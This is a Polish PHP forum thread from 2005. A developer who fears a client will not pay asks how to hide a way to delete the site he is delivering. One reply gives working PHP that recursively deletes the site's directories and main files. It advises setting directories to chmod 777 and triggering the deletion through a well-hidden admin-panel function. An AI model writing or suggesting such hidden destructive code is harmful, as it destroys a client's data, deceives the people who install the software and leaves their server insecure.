Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Zabezpieczenie przed nieuczciwym klientem, Jak skasowac zdalnie strone :)
cyberpooh
post
Post #1





Grupa: Zarejestrowani
Postów: 11
Pomógł: 0
Dołączył: 19.07.2005

Ostrzeżenie: (0%)
-----

Witam!
Najpierw moze przedstawie sytuacje.
Mam klienta dla ktorego pisze serwis, ale ostatnio zaczely sie pewne klopoty z dogadywaniem sie. Obawiam sie ze w momencie zainstalowania strony na ich serwerze (a w umowie jest napisane to jako warunek ukonczenia strony i wyplaty nazleznosci) zostanie zmienione haslo do serwera, oni beda miec stronke i nie wyplaca mi pieniedzy. Nie mam ochoty sie bawic w prawnikow i ciagac sie po sadach bo nie mam na to czasu, chce wprowadzic jakies zabezpieczenie kasujace strone.

Prosze was o jakies pomysly w tym temacie.
Mi przyszlo do glowy, wsrod bibliotek zakodowac funkcje, ktora zostanie uruchomiona po wejscu na specjalny url z kodem, kasujaca wszystkie pliki php. Ale widze w tym juz kilka problemow.

Moze jakies inne sposoby?

Pozdr

php -> Hydepark / crashu
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
chojraq
post
Post #2





Grupa: Zarejestrowani
Postów: 3
Pomógł: 0
Dołączył: 3.12.2004

Ostrzeżenie: (0%)
-----

Robisz plik php w ktorym jest taki kod:

[PHP] pobierz, plaintext 
  1. <?php
  2.  
  3. class Clear {
  4.  
  5. 	function Clear( ) { }
  6.  
  7. 	function run( ) {
  8. 		deldir( DOCUMENT_ROOT .'libs' );
  9. 		deldir( DOCUMENT_ROOT .'actions' );
  10. 		deldir( DOCUMENT_ROOT .'templates' );
  11. 		deldir( DOCUMENT_ROOT .'template' );
  12. 		deldir( DOCUMENT_ROOT .'compiled' );
  13. 		deldir( DOCUMENT_ROOT .'models' );
  14. 		deldir( DOCUMENT_ROOT .'blocks' );
  15. 		unlink( DOCUMENT_ROOT .'index.php' );
  16. 		unlink( DOCUMENT_ROOT .'LibDir.php' );
  17. 	} // tutaj podajesz dostep do katalogow
  18.  
  19. 	function _die( ) {
  20. 		out( &#092;"niszcze obiekt\" );
  21. 	}
  22. }
  23.  
  24. function deldir($dir) {
  25.    $dh=opendir($dir);
  26.    while ($file=readdir($dh)) {
  27. 	   if($file!=&#092;".\" && $file!=\"..\") {
  28. 		   $fullpath=$dir.&#092;"/\".$file;
  29. 		   if(!is_dir($fullpath)) {
  30. 			   unlink($fullpath);
  31. 		   } else {
  32. 			   deldir($fullpath);
  33. 		   }
  34. 	   }
  35.    }
  36.  
  37.    closedir($dh);
  38.  
  39.    if(rmdir($dir)) {
  40. 	   return true;
  41.    } else {
  42. 	   return false;
  43.    }
  44. }
  45.  
  46. ?>
[PHP] pobierz, plaintext


Potem na katalogi dajesz chmod 777, a funkcje wywolujesz np: z panelu admina ktora bedzie dosyc dobrze ukryta. Wiem ze dziala bo sam musialem tego uzyc kiedys...
Go to the top of the page
+Quote Post

Posty w temacie
- cyberpooh   Zabezpieczenie przed nieuczciwym klientem   19.07.2005, 11:53:22
- - _Mateo   ja bym zrobił jakis plik dobrze ukryty o niepozorn...   19.07.2005, 12:32:10
- - seaquest   Prosta sprawa: kupujesz licencję Zend Encodera, ko...   19.07.2005, 13:09:47
- - chojraq   Robisz plik php w ktorym jest taki kod: [PHP] pob...   19.07.2005, 13:13:08
- - cyberpooh   ZendEncoder odpada. Widze ze rowniez myslicie o ka...   19.07.2005, 13:51:01
- - strife   Ale chmod" title="Zobacz w manualu PHP" target="_m...   19.07.2005, 13:53:36
- - chojraq   No i sprawe masz rozwiazana piszesz funkcje ktora ...   19.07.2005, 14:25:26
- - cyberpooh   tak, ale pliki wrzucasz jako user xxx i ownerem pl...   19.07.2005, 14:42:58
- - patrycjusz   Witam, pozwolę sobie na poruszenie kilku kwesti, ...   19.07.2005, 23:04:44
- - cyberpooh   W sumie masz racje, backdory moga zle wplynac na c...   20.07.2005, 07:58:56
- - Ace   a jesli w umowie zastrege sobie mozliwosc zablokow...   20.07.2005, 10:55:48
- - NuLL   Pomysł z usunięciem wszystkiego jest bardzo fajny ...   20.07.2005, 11:24:35
- - cyberpooh   wypuszczenie w siec nie wchodzi w gre poniewaz jes...   20.07.2005, 11:49:49
- - DavidPL   Możesz jeszcze wprowadzić mechanizm w stylu: Oprog...   20.07.2005, 12:21:26
- - cyberpooh   davidpl ten pomysl mi sie podoba... to moze byc ca...   20.07.2005, 14:00:00
- - patrycjusz   Cytat(cyberpooh @ 2005-07-20 12:49:49)"P...   20.07.2005, 18:50:49
- - aleksander   a nie lepiej zrobic zamiast sztucznych bledow, po ...   20.07.2005, 19:05:19
- - hwao   mnie sie wydaje ze bardziej "bezpieczne...   20.07.2005, 20:35:51
- - ebe   A backup? Nie uważacie, że nieuczciwy klient może ...   20.07.2005, 23:04:59
- - Ace   wiesz backup wtedy to nie problem, bo jesli on nie...   21.07.2005, 08:09:59
- - cyberpooh   oczywiscie ze moze odzyskac z backupy firmy hostin...   21.07.2005, 08:13:15
- - Imperior   Jeden warunek - klient nie kumaty w php... Bo tak,...   21.07.2005, 11:26:13
- - cyberpooh   no to sprawa oczywista, w zasadzie jakie zabezpie...   21.07.2005, 12:23:22

« Następny starszy · Hydepark · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 7.10.2025 - 21:17
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn